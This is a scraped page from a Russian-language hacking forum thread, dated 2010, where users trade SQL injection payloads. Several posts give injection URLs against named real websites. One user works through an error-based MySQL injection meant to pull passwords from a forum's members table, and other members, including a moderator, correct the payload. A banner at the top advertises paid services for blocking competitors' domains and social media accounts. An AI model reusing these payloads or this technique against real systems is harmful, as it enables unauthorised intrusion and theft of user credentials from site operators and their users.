УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1416 из 2438

1416

Опции темы

Поиск в этой теме

Опции просмотра

#14151

01.07.2010, 20:52

IMMORTAL_S

Новичок

Регистрация: 29.04.2010

Сообщений: 19

Провел на форуме:
58603

Репутация: 3

другого ответа я не ожидал))

#14152

02.07.2010, 12:50

durito

Познающий

Регистрация: 06.06.2008

Сообщений: 76

Провел на форуме:
117639

Репутация: 55

Отправить сообщение для durito с помощью ICQ

вот еще одна гимморная скуль:

http://www.caffmoscommunity.com/show_review.asp?rid=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.TABLES)--

а вот вывести имя второй таблицы уже проблема

#14153

02.07.2010, 13:15

Train

Новичок

Регистрация: 09.01.2009

Сообщений: 21

Провел на форуме:
195619

Репутация: 10

Еще 15 минут назад сам не знал. но использовал гугл

http://www.caffmoscommunity.com/show_review.asp?rid=%28SELECT+TABLE_NAME+FROM+%20I NFORMATION_SCHEMA.TABLES%20for%20xml%20raw%29--

Информацию получил с http://raz0r.name/obzory/select-for-xml-sql-injection/

#14154

02.07.2010, 16:27

SeNaP

Участник форума

Регистрация: 07.08.2008

Сообщений: 281

Провел на форуме:
3300342

Репутация: 165

как быть тут?

http://fixwap.net/ru/html/complain.php?uid=-1%20OR%2017-7=10

#14155

02.07.2010, 16:31

#Wolf#

Постоянный

Регистрация: 26.03.2008

Сообщений: 311

Провел на форуме:
3799424

Репутация: 479

Нуждаюсь в помощис флуром.

Цитата:

Сообщение от None

DB Detection: MySQL error based
Method: GET
Type: Integer

типо самописный модуль для ipb 1.31

урл засветить к сожалению не могу.

запрос возвращающий юзера:

Цитата:

Сообщение от None

id=201255656844 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user(),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

result:

Цитата:

Сообщение от None

mySQL query error: SELECT * FROM ibf_photo_albums WHERE album_member = 201255656844 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user(),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
ORDER BY album_time DESC
from_file: /var/www/***********photo.php from_line:193
mySQL error: Duplicate entry '~'mysql@192.168.0.1'~1' for key 'group_key'
mySQL error code:

пробую выбирать из таблы:

Цитата:

Сообщение от None

id=201255656844 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 0x6962665f6d656d62657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

и получаю:

Цитата:

Сообщение от None

mySQL query error: SELECT * FROM ibf_photo_albums WHERE album_member = 2059844 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 0x6962665f6d656d62657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
ORDER BY album_time DESC
from_file: /var/www/***********photo.php from_line:193
mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x6962665f6d656d62657273 limit 0,1),floor(rand(0)*2))x from information_schema.t' at line 1
mySQL error code:

#14156

02.07.2010, 16:38

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

#Wolf# попробуй зачарить

#14157

02.07.2010, 16:45

#Wolf#

Постоянный

Регистрация: 26.03.2008

Сообщений: 311

Провел на форуме:
3799424

Репутация: 479

Цитата:

Сообщение от Konqi

Konqi said:
#Wolf#
попробуй зачарить

Цитата:

Сообщение от None

mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'char(105,98,102,95,109,101,109,98,101,114,115) limit 0,1),floor(rand(0)*2))x fro' at line 1
mySQL error code:

...

#14158

02.07.2010, 17:05

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

Провел на форуме:
5011696

Репутация: 2221

Таблы хексить нельзя...

#14159

02.07.2010, 17:11

#Wolf#

Постоянный

Регистрация: 26.03.2008

Сообщений: 311

Провел на форуме:
3799424

Репутация: 479

Цитата:

Сообщение от Ctacok

Ctacok said:
Таблы хексить нельзя...

все равно не работает, уже все перепробовал.

#14160

02.07.2010, 17:14

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

Провел на форуме:
5011696

Репутация: 2221

Цитата:

Сообщение от None

id=201255656844 and(select 1 from(select count(*),concat((select password from табла_с_юзерами limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

эм =\

Страница 1416 из 2438

1416

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход